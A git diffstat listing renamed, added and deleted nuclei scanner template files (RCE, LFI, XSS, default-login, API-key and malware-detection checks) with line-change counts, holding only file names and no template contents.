nuclei-templates/Other/SAP-NetWeaver-rce.yaml | 22 - .../Other/SQLInjection_ERROR.yaml | 42 +- nuclei-templates/Other/SQLNet-log.yaml | 34 +- nuclei-templates/Other/Sap-redirect.yaml | 29 - ...-media-rce.yaml => Seagate-media-rce.yaml} | 0 nuclei-templates/Other/Shellshock-RCE-1.yaml | 20 + .../Other/Shopify-custom-token.yaml | 16 + ...{shopify-token.yaml => Shopify-token.yaml} | 0 .../{slack-api-11864.yaml => Slack-api.yaml} | 0 .../Other/SpringBoot-Heapdump.yaml | 30 + .../Other/Springboot-Heapdump.yaml | 30 - .../Other/Springboot-Httptrace.yaml | 38 + ...ss-token.yaml => Square-access-token.yaml} | 0 ...h-secret.yaml => Square-oauth-secret.yaml} | 0 nuclei-templates/Other/SquirrelMail.yaml | 22 - .../Other/Symantec-Messaging-Gateway.yaml | 23 - nuclei-templates/Other/SymfonyRCE.yaml | 26 - ...\351\234\262\346\274\217\346\264\236.yaml" | 48 +- ...{tenda-leakage.yaml => Tenda-leakage.yaml} | 0 nuclei-templates/Other/ThinkPHP-501-RCE.yaml | 30 - .../Other/UnAuthenticated-Tensorboard.yaml | 27 + 
nuclei-templates/Other/WSO2-2019-0598.yaml | 34 - nuclei-templates/Other/WSO2MgmtConsole.yaml | 4 - .../Other/{X-Host .yaml => X-Host.yaml} | 0 .../{X-Remote-IP .yaml => X-Remote-IP.yaml} | 0 nuclei-templates/Other/aar-malware.yaml | 6 +- ...b-server-13.yaml => abyss-web-server.yaml} | 0 nuclei-templates/Other/ac-weak-login.yaml | 10 +- nuclei-templates/Other/academy-lms-xss.yaml | 15 +- .../Other/accent-microcomputers-lfi-14.yaml | 28 + .../Other/accent-microcomputers-lfi-16.yaml | 34 - .../Other/access-control-allow-origin.yaml | 4 +- .../{access-log.yaml => access-log-22.yaml} | 0 .../Other/accessibility-helper-xss-19.yaml | 30 + .../Other/accessibility-helper-xss.yaml | 31 - .../Other/accueil-wampserver.yaml | 17 +- .../Other/ace-admin-dashboard.yaml | 14 +- .../Other/acemanager-login-23.yaml | 69 +- nuclei-templates/Other/acenet-panel.yaml | 5 +- nuclei-templates/Other/achecker-panel.yaml | 9 +- .../{acme-xss-28.yaml => acme-xss-30.yaml} | 0 nuclei-templates/Other/acontent-detect.yaml | 52 +- .../Other/acquia-takeover-35.yaml | 21 + nuclei-templates/Other/acquia-takeover.yaml | 21 - ...hboard.yaml => acrolinx-dashboard-36.yaml} | 0 nuclei-templates/Other/acti-panel.yaml | 7 +- .../Other/active-admin-exposure-39.yaml | 4 +- .../Other/activemq-default-login-48.yaml | 33 - .../Other/activemq-default-login.yaml | 30 + .../activemq-openwire-transport-detect.yaml | 64 +- nuclei-templates/Other/activemq-panel-50.yaml | 19 + nuclei-templates/Other/activemq-panel-52.yaml | 19 - nuclei-templates/Other/activemq_apollo.yaml | 20 + .../Other/acunetix-360-installer.yaml | 5 +- nuclei-templates/Other/acunetix-login.yaml | 9 +- ...x-panel-59.yaml => acunetix-panel-56.yaml} | 0 nuclei-templates/Other/ad-inserter.yaml | 2 +- nuclei-templates/Other/ad-widget-lfi-124.yaml | 22 + nuclei-templates/Other/ad-widget-lfi-126.yaml | 33 - nuclei-templates/Other/adafruit-key.yaml | 5 +- .../Other/adb-backup-enabled-61.yaml | 15 + .../Other/adb-backup-enabled-62.yaml | 16 - 
nuclei-templates/Other/add-to-any.yaml | 2 +- .../Other/addeventlistener-detect-64.yaml | 19 - .../Other/addeventlistener-detect-66.yaml | 20 + .../Other/addeventlistener-message.yaml | 2 - .../Other/addonfinance-portal.yaml | 5 +- .../Other/adhoc-transfer-panel.yaml | 6 +- .../Other/adiscon-loganalyzer.yaml | 29 - nuclei-templates/Other/admin-file-search.yaml | 7 +- nuclei-templates/Other/admin-menu-editor.yaml | 2 +- .../Other/admin-word-count-column-lfi-81.yaml | 21 + .../Other/admin-word-count-column-lfi.yaml | 33 - nuclei-templates/Other/adminer-panel-75.yaml | 50 + .../Other/adminer-panel-detect.yaml | 10 +- .../Other/adminer-panel-fuzz-73.yaml | 46 - .../Other/adminer-panel-fuzz.yaml | 39 + nuclei-templates/Other/adminer-panel.yaml | 45 - nuclei-templates/Other/adminimize.yaml | 6 +- nuclei-templates/Other/adminset-panel-78.yaml | 10 +- .../Other/admiralcloud-detect.yaml | 2 +- .../Other/admzip-path-overwrite.yaml | 14 +- nuclei-templates/Other/adobe-client.yaml | 5 +- ...3.yaml => adobe-coldfusion-detect-82.yaml} | 0 .../Other/adobe-coldfusion-detect-84.yaml | 114 +- .../adobe-coldfusion-error-detect-87.yaml | 55 +- ...aml => adobe-coldfusion-error-detect.yaml} | 0 .../Other/adobe-component-login-89.yaml | 31 + .../Other/adobe-component-login-90.yaml | 32 - .../Other/adobe-component-login.yaml | 8 +- .../Other/adobe-connect-central-login-93.yaml | 23 - .../Other/adobe-connect-central-login-97.yaml | 33 + ...> adobe-connect-username-exposure-98.yaml} | 0 ...on-102.yaml => adobe-connect-version.yaml} | 0 .../adobe-experience-manager-login-105.yaml | 30 + .../adobe-experience-manager-login-109.yaml | 23 - .../Other/adobe-media-server-112.yaml | 23 + .../Other/adobe-media-server.yaml | 31 - nuclei-templates/Other/adobe-secret.yaml | 5 +- .../advanced-access-manager-lfi-118.yaml | 31 + .../Other/advanced-access-manager-lfi.yaml | 35 - .../advanced-access-manager-plugin-lfi.yaml | 2 +- .../Other/advanced-custom-fields.yaml | 4 +- 
nuclei-templates/Other/adzok-malware.yaml | 5 +- nuclei-templates/Other/aem-acs-common.yaml | 5 +- .../Other/aem-bg-servlet-127.yaml | 24 - .../Other/aem-bg-servlet-129.yaml | 23 + nuclei-templates/Other/aem-bulkeditor.yaml | 5 +- nuclei-templates/Other/aem-cms.yaml | 6 +- nuclei-templates/Other/aem-crx-browser.yaml | 5 +- ...ypass-134.yaml => aem-crx-bypass-132.yaml} | 0 nuclei-templates/Other/aem-crx-namespace.yaml | 7 +- .../Other/aem-crx-package-manager.yaml | 10 +- nuclei-templates/Other/aem-crx-search.yaml | 6 +- nuclei-templates/Other/aem-custom-script.yaml | 8 +- .../Other/aem-debugging-libraries.yaml | 5 +- ....yaml => aem-default-get-servlet-139.yaml} | 0 .../Other/aem-default-login-140.yaml | 46 - .../Other/aem-default-login-141.yaml | 56 + nuclei-templates/Other/aem-detaction.yaml | 11 +- nuclei-templates/Other/aem-detect.yaml | 6 +- ...-detection.yaml => aem-detection-145.yaml} | 0 nuclei-templates/Other/aem-disk-usage.yaml | 6 +- .../Other/aem-dump-contentnode.yaml | 8 +- .../Other/aem-explorer-nodetypes.yaml | 5 +- .../Other/aem-external-link-checker.yaml | 6 +- nuclei-templates/Other/aem-felix-console.yaml | 9 +- ...vlet-147.yaml => aem-gql-servlet-150.yaml} | 0 ...onsole-153.yaml => aem-groovyconsole.yaml} | 0 .../Other/aem-hash-querybuilder-160.yaml | 30 - .../Other/aem-hash-querybuilder.yaml | 26 + .../Other/aem-jcr-querybuilder-162.yaml | 28 + .../Other/aem-jcr-querybuilder-164.yaml | 31 - nuclei-templates/Other/aem-login-status.yaml | 15 +- ...ml => aem-merge-metadata-servlet-172.yaml} | 0 nuclei-templates/Other/aem-misc-admin.yaml | 27 +- .../Other/aem-offloading-browser.yaml | 5 +- nuclei-templates/Other/aem-osgi-bundles.yaml | 5 +- .../aem-querybuilder-feed-servlet-175.yaml | 23 + .../aem-querybuilder-feed-servlet-177.yaml | 23 - ...m-querybuilder-internal-path-read-180.yaml | 25 - .../aem-querybuilder-internal-path-read.yaml | 24 + .../aem-querybuilder-json-servlet-184.yaml | 30 + .../Other/aem-querybuilder-json-servlet.yaml | 41 - 
nuclei-templates/Other/aem-secrets.yaml | 44 - .../Other/aem-security-users.yaml | 5 +- .../Other/aem-setpreferences-xss-189.yaml | 26 + .../Other/aem-setpreferences-xss.yaml | 30 - nuclei-templates/Other/aem-sling-login.yaml | 10 +- .../Other/aem-sling-userinfo.yaml | 6 +- .../Other/aem-userinfo-servlet-190.yaml | 25 + .../Other/aem-userinfo-servlet-192.yaml | 31 - .../aem-wcm-suggestions-servlet-194.yaml | 26 - .../Other/aem-wcm-suggestions-servlet.yaml | 27 + .../Other/aem-xss-childlist-selector-197.yaml | 35 - .../Other/aem-xss-childlist-selector.yaml | 30 + nuclei-templates/Other/aerocms-detect.yaml | 7 +- nuclei-templates/Other/aerocms-sqli.yaml | 7 +- .../Other/aerohive-netconfig-ui-201.yaml | 31 - .../Other/aerohive-netconfig-ui.yaml | 42 + .../Other/afterlogic-webmail-login.yaml | 8 +- .../Other/aftership-takeover-203.yaml | 15 - .../Other/aftership-takeover-206.yaml | 16 + .../Other/age-gate-open-redirect-207.yaml | 9 +- nuclei-templates/Other/age-gate-xss.yaml | 9 +- .../Other/age-identity-secret-key.yaml | 6 +- .../Other/age-recipient-public-key.yaml | 6 +- ...keover.yaml => agilecrm-takeover-209.yaml} | 0 nuclei-templates/Other/aha-takeover-214.yaml | 15 - nuclei-templates/Other/aha-takeover-216.yaml | 16 + .../{AIC-leakage.yaml => aic-leakage.yaml} | 0 .../Other/aims-password-mgmt-client-219.yaml | 17 - .../Other/aims-password-mgmt-client.yaml | 27 + .../Other/aims-password-portal-222.yaml | 22 + .../Other/aims-password-portal-224.yaml | 22 - .../Other/aircube-dashboard-panel.yaml | 9 +- nuclei-templates/Other/aircube-login.yaml | 9 +- .../Other/airflow-api-exposure.yaml | 1 + .../airflow-configuration-exposure-230.yaml | 18 - .../Other/airflow-configuration-exposure.yaml | 16 + nuclei-templates/Other/airflow-debug-233.yaml | 26 - nuclei-templates/Other/airflow-debug.yaml | 29 + .../Other/airflow-default-credentials.yaml | 7 - .../Other/airflow-default-login-236.yaml | 57 + .../Other/airflow-default-login.yaml | 64 - ...etect-240.yaml => 
airflow-detect-239.yaml} | 0 nuclei-templates/Other/airflow-panel-242.yaml | 19 + nuclei-templates/Other/airflow-panel-245.yaml | 28 - ...horized.yaml => airflow-unauthorized.yaml} | 0 nuclei-templates/Other/airnotifier-panel.yaml | 9 +- nuclei-templates/Other/airtable-key.yaml | 6 +- .../Other/ait-csv-import-export-rce.yaml | 21 +- nuclei-templates/Other/aj-report.yaml | 20 + .../Other/akamai-arl-xss-248.yaml | 31 + .../Other/akamai-arl-xss-249.yaml | 31 - .../Other/akamai-cache-detect.yaml | 9 +- ...oudtest.yaml => akamai-cloudtest-254.yaml} | 0 nuclei-templates/Other/akamai-detect.yaml | 9 +- .../Other/akamai-s3-cache-poisoning.yaml | 23 +- nuclei-templates/Other/akismet.yaml | 4 +- nuclei-templates/Other/alfa-malware.yaml | 4 +- .../Other/alfacgiapi-wordpress-256.yaml | 33 - .../Other/alfacgiapi-wordpress.yaml | 32 + .../Other/alfresco-detect-258.yaml | 33 + .../Other/alfresco-detect-259.yaml | 43 - nuclei-templates/Other/algolia-key.yaml | 5 +- ...ad.yaml => alibaba-anyproxy-fileread.yaml} | 0 .../Other/alibaba-anyproxy-lfi.yaml | 4 +- ...> alibaba-canal-default-password-262.yaml} | 0 nuclei-templates/Other/alibaba-key-id.yaml | 3 +- .../Other/alibaba-mongoshake-unauth.yaml | 2 +- nuclei-templates/Other/alibaba-secret-id.yaml | 3 +- nuclei-templates/Other/alienspy-malware.yaml | 6 +- .../Other/alienvault-usm-274.yaml | 10 +- nuclei-templates/Other/alina-malware.yaml | 6 +- .../Other/all-404-redirect-to-homepage.yaml | 8 +- .../Other/all-in-one-seo-pack.yaml | 2 +- .../Other/all-in-one-wp-migration.yaml | 4 +- .../all-in-one-wp-security-and-firewall.yaml | 2 +- .../Other/allied-telesis-exposure.yaml | 13 +- nuclei-templates/Other/alpha-malware.yaml | 4 +- .../Other/alphaweb-default-login-275.yaml | 38 + .../Other/alphaweb-default-login-277.yaml | 35 - .../Other/alumni-management-sqli.yaml | 13 +- nuclei-templates/Other/amazon-account-id.yaml | 5 +- ...fig.yaml => amazon-docker-config-280.yaml} | 0 nuclei-templates/Other/amazon-ec2-detect.yaml | 5 +- 
nuclei-templates/Other/amazon-ec2-ssrf.yaml | 6 +- .../Other/amazon-mws-auth-token-11845.yaml | 17 + .../Other/amazon-mws-auth-token-value.yaml | 16 - ...en-283.yaml => amazon-mws-auth-token.yaml} | 0 .../Other/amazon-session-token.yaml | 5 +- .../Other/ambari-default-login-287.yaml | 26 + .../Other/ambari-default-login-290.yaml | 35 - ...sure-294.yaml => ambari-exposure-291.yaml} | 0 nuclei-templates/Other/amcrest-login-297.yaml | 28 - nuclei-templates/Other/amcrest-login.yaml | 34 + .../Other/amministrazione-aperta-lfi-303.yaml | 15 +- .../Other/amp-application-panel.yaml | 15 +- nuclei-templates/Other/amp.yaml | 2 +- nuclei-templates/Other/ampache-debug.yaml | 6 +- .../Other/ampache-music-installer.yaml | 5 +- nuclei-templates/Other/ampache-panel.yaml | 13 +- .../Other/ampache-update-exposure.yaml | 5 +- .../Other/ampguard-wifi-setup.yaml | 7 +- ...el-306.yaml => ampps-admin-panel-305.yaml} | 0 ...listing.yaml => ampps-dirlisting-308.yaml} | 0 nuclei-templates/Other/ampps-panel-309.yaml | 40 - nuclei-templates/Other/ampps-panel-310.yaml | 35 + .../Other/analytify-plugin-xss.yaml | 13 +- .../Other/anaqua-login-panel.yaml | 6 +- .../android-debug-database-exposed-312.yaml | 23 - .../Other/android-debug-database-exposed.yaml | 24 + nuclei-templates/Other/andromeda-malware.yaml | 5 +- ...ngular-client-side-template-injection.yaml | 10 +- nuclei-templates/Other/angular-detect.yaml | 6 +- nuclei-templates/Other/angular-json.yaml | 6 +- ...-takeover.yaml => anima-takeover-317.yaml} | 0 ...leDownload.yaml => anni-filedownload.yaml} | 0 ...322.yaml => announcekit-takeover-324.yaml} | 0 .../Other/ansible-awx-detect.yaml | 5 +- .../Other/ansible-config-disclosure-326.yaml | 18 - .../Other/ansible-config-disclosure.yaml | 16 + .../Other/ansible-semaphore-panel-327.yaml | 34 - .../Other/ansible-semaphore-panel.yaml | 26 + .../Other/ansible-tower-exposure-331.yaml | 40 - .../Other/ansible-tower-exposure-332.yaml | 19 + nuclei-templates/Other/antispam-bee.yaml | 2 +- 
.../Other/antsword-backdoor-335.yaml | 35 - nuclei-templates/Other/antsword-backdoor.yaml | 24 + ...eakPass.yaml => aolynkbr304-weakpass.yaml} | 0 .../Other/ap0calypse-malware.yaml | 6 +- .../Other/apache-activemq-detect.yaml | 56 +- ...kPass.yaml => apache-ambari-weakpass.yaml} | 0 .../Other/apache-apisix-panel-336.yaml | 30 + .../Other/apache-apisix-panel-337.yaml | 25 - .../Other/apache-axis-detect-340.yaml | 64 +- nuclei-templates/Other/apache-detect-348.yaml | 30 + nuclei-templates/Other/apache-detect.yaml | 30 - .../Other/apache-drill-exposure.yaml | 5 +- .../Other/apache-druid-kafka-connect-rce.yaml | 99 + .../Other/apache-druid-log4j.yaml | 6 +- .../Other/apache-druid-unauth.yaml | 6 +- ...tect-351.yaml => apache-dubbo-detect.yaml} | 0 .../Other/apache-dubbo-unauth.yaml | 15 +- .../Other/apache-filename-enum-354.yaml | 30 + .../Other/apache-filename-enum.yaml | 30 - .../Other/apache-flink-unauth-rce-356.yaml | 44 + .../Other/apache-flink-unauth-rce-358.yaml | 39 - ...acamole-361.yaml => apache-guacamole.yaml} | 0 ...ml => apache-hertzbeat-default-login.yaml} | 0 ...tpd-rce-362.yaml => apache-httpd-rce.yaml} | 0 .../Other/apache-jmeter-dashboard.yaml | 12 +- .../Other/apache-karaf-panel.yaml | 5 +- nuclei-templates/Other/apache-licenserc.yaml | 5 +- .../Other/apache-mesos-panel.yaml | 15 +- .../Other/apache-nifi-unauth.yaml | 43 + .../Other/apache-rocketmq-broker-unauth.yaml | 33 +- .../Other/apache-solr-file-read-368.yaml | 44 + ... 
=> apache-solr-log4j-cve-2021-44228.yaml} | 0 .../Other/apache-solr-log4j-rce.yaml | 9 +- nuclei-templates/Other/apache-solr-rce.yaml | 9 +- .../Other/apache-streampipes-detect.yaml | 78 +- .../Other/apache-struts-showcase.yaml | 8 +- ...yaml => apache-tomcat-cve-2022-34305.yaml} | 0 .../apache-tomcat-snoop-ip-disclosure.yaml | 4 - nuclei-templates/Other/apachesolrlfissrf.yaml | 47 + nuclei-templates/Other/apc-info-379.yaml | 22 - nuclei-templates/Other/apc-ups-login-381.yaml | 25 + nuclei-templates/Other/apc-ups-login-382.yaml | 24 - nuclei-templates/Other/apc_info.yaml | 19 + nuclei-templates/Other/apdisk-disclosure.yaml | 4 +- nuclei-templates/Other/apeosport-v_c3375.yaml | 21 + ...pereo-Cas-rce.yaml => apereo-cas-rce.yaml} | 0 nuclei-templates/Other/api-1forge.yaml | 10 +- .../api-abstract-company-enrichment.yaml | 7 +- .../Other/api-abstract-email-validation.yaml | 7 +- .../Other/api-abstract-exchange-rates.yaml | 7 +- .../Other/api-abstract-iban-validation.yaml | 7 +- .../Other/api-abstract-image-processing.yaml | 7 +- .../Other/api-abstract-ip-geolocation.yaml | 7 +- .../Other/api-abstract-phone-validation.yaml | 7 +- .../Other/api-abstract-public-holidays.yaml | 7 +- .../Other/api-abstract-timezone.yaml | 7 +- .../Other/api-abstract-user-avatars.yaml | 7 +- .../api-abstract-vat-validation-rates.yaml | 7 +- .../Other/api-abstract-website-scraping.yaml | 7 +- .../api-abstract-website-screenshot.yaml | 9 +- ...tractapi.yaml => api-abstractapi-383.yaml} | 0 ...fruit-io-387.yaml => api-adafruit-io.yaml} | 0 nuclei-templates/Other/api-airtable.yaml | 7 +- .../Other/api-alienvault-390.yaml | 26 - nuclei-templates/Other/api-alienvault.yaml | 26 + nuclei-templates/Other/api-amdoren.yaml | 10 +- nuclei-templates/Other/api-api2convert.yaml | 7 +- nuclei-templates/Other/api-apiflash.yaml | 7 +- nuclei-templates/Other/api-asana-393.yaml | 18 + nuclei-templates/Other/api-asana.yaml | 25 - nuclei-templates/Other/api-binaryedge.yaml | 11 +- 
nuclei-templates/Other/api-bingmaps-395.yaml | 19 - nuclei-templates/Other/api-bingmaps.yaml | 16 + nuclei-templates/Other/api-blitapp.yaml | 7 +- nuclei-templates/Other/api-block-400.yaml | 25 + nuclei-templates/Other/api-block.yaml | 26 - .../Other/api-blockchain-398.yaml | 8 +- nuclei-templates/Other/api-browshot.yaml | 7 +- nuclei-templates/Other/api-c99.yaml | 9 +- nuclei-templates/Other/api-calendly-404.yaml | 17 + nuclei-templates/Other/api-calendly.yaml | 25 - nuclei-templates/Other/api-chaos.yaml | 11 +- nuclei-templates/Other/api-clearbit-407.yaml | 27 - nuclei-templates/Other/api-clearbit.yaml | 28 + nuclei-templates/Other/api-clickup.yaml | 7 +- nuclei-templates/Other/api-clockify.yaml | 7 +- nuclei-templates/Other/api-cloudconvert.yaml | 7 +- nuclei-templates/Other/api-cloudflare.yaml | 7 +- nuclei-templates/Other/api-codestats.yaml | 7 +- nuclei-templates/Other/api-coinmarketcap.yaml | 10 +- nuclei-templates/Other/api-coinranking.yaml | 10 +- ...itt-411.yaml => api-cooperhewitt-409.yaml} | 0 nuclei-templates/Other/api-craftmypdf.yaml | 7 +- .../Other/api-currencyfreaks.yaml | 7 +- nuclei-templates/Other/api-currencylayer.yaml | 7 +- nuclei-templates/Other/api-currencyscoop.yaml | 7 +- nuclei-templates/Other/api-debounce-414.yaml | 25 - nuclei-templates/Other/api-debounce.yaml | 25 + nuclei-templates/Other/api-deviantart.yaml | 21 + nuclei-templates/Other/api-digitalocean.yaml | 7 +- nuclei-templates/Other/api-dribbble-416.yaml | 21 + nuclei-templates/Other/api-dribbble-417.yaml | 21 - .../{dropbox.yaml => api-dropbox-418.yaml} | 0 nuclei-templates/Other/api-europeana-419.yaml | 25 + nuclei-templates/Other/api-europeana.yaml | 21 - .../Other/api-exchangerateapi.yaml | 7 +- ...pi-facebook-422.yaml => api-facebook.yaml} | 0 nuclei-templates/Other/api-fastly.yaml | 14 +- nuclei-templates/Other/api-festivo-425.yaml | 25 - nuclei-templates/Other/api-festivo.yaml | 26 + nuclei-templates/Other/api-flickr.yaml | 7 +- nuclei-templates/Other/api-flowdash.yaml | 
7 +- ...tawesome.yaml => api-fontawesome-426.yaml} | 0 ...oud-427.yaml => api-fortitoken-cloud.yaml} | 0 nuclei-templates/Other/api-front.yaml | 8 +- nuclei-templates/Other/api-giphy.yaml | 7 +- nuclei-templates/Other/api-gitlab-431.yaml | 12 +- .../Other/api-google-drive-432.yaml | 28 + nuclei-templates/Other/api-google-drive.yaml | 23 - nuclei-templates/Other/api-gorest.yaml | 7 +- .../Other/api-harvardart-433.yaml | 25 + .../Other/api-harvardart-434.yaml | 25 - .../{api-heroku-435.yaml => api-heroku.yaml} | 0 .../Other/api-hirak-rates-436.yaml | 32 + nuclei-templates/Other/api-hirak-rates.yaml | 27 - nuclei-templates/Other/api-host-io.yaml | 7 +- nuclei-templates/Other/api-html2pdf.yaml | 7 +- nuclei-templates/Other/api-hubspot-437.yaml | 21 - nuclei-templates/Other/api-hunter.yaml | 7 +- ...confinder.yaml => api-iconfinder-438.yaml} | 0 nuclei-templates/Other/api-improvmx-440.yaml | 29 + nuclei-templates/Other/api-improvmx.yaml | 30 - nuclei-templates/Other/api-instagram.yaml | 13 +- nuclei-templates/Other/api-intelx.yaml | 13 +- ...pi-intercom.yaml => api-intercom-443.yaml} | 0 nuclei-templates/Other/api-ip2whois.yaml | 7 +- nuclei-templates/Other/api-ipdata.yaml | 20 +- nuclei-templates/Other/api-ipfind.yaml | 7 +- nuclei-templates/Other/api-ipinfo.yaml | 9 +- nuclei-templates/Other/api-ipstack-444.yaml | 17 + nuclei-templates/Other/api-jsonbin.yaml | 7 +- .../{jumpcloud.yaml => api-jumpcloud.yaml} | 0 .../Other/api-launchdarkly-449.yaml | 7 +- .../{api-leanix.yaml => api-leanix-450.yaml} | 0 nuclei-templates/Other/api-lob.yaml | 9 +- ...pi-lokalise.yaml => api-lokalise-452.yaml} | 0 .../Other/api-mac-address-lookup.yaml | 7 +- nuclei-templates/Other/api-mailchimp.yaml | 20 - ...pi-malshare-457.yaml => api-malshare.yaml} | 0 .../Other/api-malwarebazaar-458.yaml | 40 + nuclei-templates/Other/api-malwarebazaar.yaml | 40 - .../{mapbox.yaml => api-mapbox-465.yaml} | 0 nuclei-templates/Other/api-mojoauth-466.yaml | 26 + nuclei-templates/Other/api-mojoauth.yaml | 
28 - nuclei-templates/Other/api-monday.yaml | 7 +- nuclei-templates/Other/api-moonpay.yaml | 7 +- nuclei-templates/Other/api-mywot-467.yaml | 27 - nuclei-templates/Other/api-mywot.yaml | 27 + nuclei-templates/Other/api-networksdb.yaml | 2 + nuclei-templates/Other/api-newrelic.yaml | 9 +- nuclei-templates/Other/api-notolytix.yaml | 2 + nuclei-templates/Other/api-npm-471.yaml | 19 + nuclei-templates/Other/api-npm.yaml | 23 - nuclei-templates/Other/api-nytimes.yaml | 7 +- .../Other/api-open-page-rank.yaml | 7 +- nuclei-templates/Other/api-opengraphr.yaml | 7 +- .../Other/api-openweather-473.yaml | 3 - nuclei-templates/Other/api-opsgenie.yaml | 11 +- nuclei-templates/Other/api-pagecdn.yaml | 7 +- nuclei-templates/Other/api-pastebin-477.yaml | 27 - nuclei-templates/Other/api-pastebin.yaml | 28 + .../{api-paypal.yaml => api-paypal-478.yaml} | 0 nuclei-templates/Other/api-pdflayer.yaml | 7 +- nuclei-templates/Other/api-pendo.yaml | 14 +- nuclei-templates/Other/api-petfinder-480.yaml | 30 - nuclei-templates/Other/api-petfinder.yaml | 31 + ...acker.yaml => api-pivotaltracker-482.yaml} | 0 .../{postmark.yaml => api-postmark-483.yaml} | 0 nuclei-templates/Other/api-prexview.yaml | 7 +- nuclei-templates/Other/api-proxycrawl.yaml | 7 +- nuclei-templates/Other/api-proxykingdom.yaml | 7 +- .../Other/api-rijksmuseum-486.yaml | 25 + nuclei-templates/Other/api-rijksmuseum.yaml | 25 - nuclei-templates/Other/api-savepage.yaml | 7 +- nuclei-templates/Other/api-scanii-487.yaml | 26 - nuclei-templates/Other/api-scanii-488.yaml | 26 + nuclei-templates/Other/api-scraperapi.yaml | 7 +- nuclei-templates/Other/api-scraperbox.yaml | 7 +- nuclei-templates/Other/api-scrapestack.yaml | 7 +- nuclei-templates/Other/api-scrapingant.yaml | 7 +- nuclei-templates/Other/api-scrapingdog.yaml | 7 +- nuclei-templates/Other/api-screenshotapi.yaml | 7 +- .../Other/api-securitytrails.yaml | 11 +- nuclei-templates/Other/api-segment.yaml | 7 +- nuclei-templates/Other/api-sendgrid-489.yaml | 3 - 
nuclei-templates/Other/api-sentry.yaml | 9 +- nuclei-templates/Other/api-serpstack.yaml | 7 +- nuclei-templates/Other/api-shodan.yaml | 9 +- nuclei-templates/Other/api-spotify-495.yaml | 20 - nuclei-templates/Other/api-spotify.yaml | 25 + nuclei-templates/Other/api-square-496.yaml | 25 - nuclei-templates/Other/api-square.yaml | 21 + .../{api-strava.yaml => api-strava-498.yaml} | 0 nuclei-templates/Other/api-stripe.yaml | 13 +- nuclei-templates/Other/api-stytch-500.yaml | 30 - nuclei-templates/Other/api-stytch.yaml | 31 + .../Other/api-supportivekoala.yaml | 7 +- nuclei-templates/Other/api-tatum.yaml | 34 +- nuclei-templates/Other/api-thecatapi-502.yaml | 3 +- nuclei-templates/Other/api-ticketmaster.yaml | 9 +- .../{api-tink-504.yaml => api-tink.yaml} | 0 nuclei-templates/Other/api-tinypng-505.yaml | 3 - nuclei-templates/Other/api-todoist.yaml | 7 +- ...{api-twitter-507.yaml => api-twitter.yaml} | 0 ...{api-urlscan-508.yaml => api-urlscan.yaml} | 0 nuclei-templates/Other/api-userstack.yaml | 9 +- .../{api-vercel.yaml => api-vercel-510.yaml} | 0 .../Other/api-virustotal-512.yaml | 30 + nuclei-templates/Other/api-virustotal.yaml | 30 - ...lstudio.yaml => api-visualstudio-513.yaml} | 0 .../{wakatime.yaml => api-wakatime-514.yaml} | 0 nuclei-templates/Other/api-wordnik.yaml | 7 +- ...{api-youtube.yaml => api-youtube-519.yaml} | 0 nuclei-templates/Other/api-zenrows.yaml | 7 +- nuclei-templates/Other/api-zerbounce.yaml | 9 +- nuclei-templates/Other/api-zoomeye.yaml | 11 +- nuclei-templates/Other/apigee-panel.yaml | 4 +- ...n-panel-464.yaml => apiman-panel-462.yaml} | 0 .../Other/apisix-default-login-491.yaml | 42 - .../Other/apisix-default-login.yaml | 37 + .../Other/apollo-default-login-521.yaml | 55 + .../Other/apollo-default-login.yaml | 57 - .../Other/apollo-server-detect-522.yaml | 37 + .../Other/apollo-server-detect.yaml | 36 - nuclei-templates/Other/appcms-detect.yaml | 7 +- ...ml => apple-app-site-association-524.yaml} | 0 
nuclei-templates/Other/apple-httpserver.yaml | 7 +- ...el_dos.yaml => application_level_dos.yaml} | 0 .../Other/application_security_gateway.yaml | 20 + .../Other/appsettings-file-disclosure.yaml | 6 +- .../Other/appsmith-web-login.yaml | 12 +- nuclei-templates/Other/appspace-panel.yaml | 8 +- nuclei-templates/Other/appsuite-panel.yaml | 10 +- .../Other/appveyor-configuration-file.yaml | 13 +- nuclei-templates/Other/appwrite-panel.yaml | 8 +- nuclei-templates/Other/aptus-detect.yaml | 4 - nuclei-templates/Other/aptus-panel.yaml | 7 +- .../Other/aqua-enterprise-detect.yaml | 5 +- .../Other/aqua-enterprise-panel.yaml | 11 +- .../Other/arangodb-web-Interface.yaml | 8 +- .../Other/arbitrary-file-read.yaml | 1 - ...s-panel-530.yaml => arcgis-panel-531.yaml} | 0 .../Other/arcgis-rest-api-532.yaml | 29 + .../Other/arcgis-rest-api-533.yaml | 32 - nuclei-templates/Other/arcgis-services.yaml | 10 +- nuclei-templates/Other/arcgis-tokens.yaml | 4 +- .../Other/archibus-webcentral-panel.yaml | 13 +- nuclei-templates/Other/arcom-malware.yaml | 5 +- nuclei-templates/Other/arcserve-panel.yaml | 10 +- nuclei-templates/Other/ares-rat-c2.yaml | 4 +- nuclei-templates/Other/argo_cd.yaml | 20 + nuclei-templates/Other/argocd-login-534.yaml | 19 + nuclei-templates/Other/argocd-login.yaml | 32 - nuclei-templates/Other/arkei-malware.yaml | 6 +- .../Other/arl-default-login-537.yaml | 9 +- .../Other/arris-modem-detect.yaml | 14 +- ...-544.yaml => artica-web-proxy-detect.yaml} | 0 .../Other/artifactory-anonymous-deploy.yaml | 30 - .../Other/artifactory_deploy.yaml | 24 + .../Other/aruba-instant-default-login.yaml | 27 +- nuclei-templates/Other/aruba_instant.yaml | 21 + nuclei-templates/Other/asana-clientid.yaml | 3 +- .../Other/asana-clientsecret.yaml | 3 +- .../Other/asanhamayesh-cms-lfi.yaml | 2 +- ...lfi-553.yaml => asanhamayesh-lfi-552.yaml} | 0 .../Other/aspcms-backend-panel.yaml | 7 +- .../Other/aspect-control-panel.yaml | 6 +- .../Other/aspnet-version-detect.yaml | 2 +- 
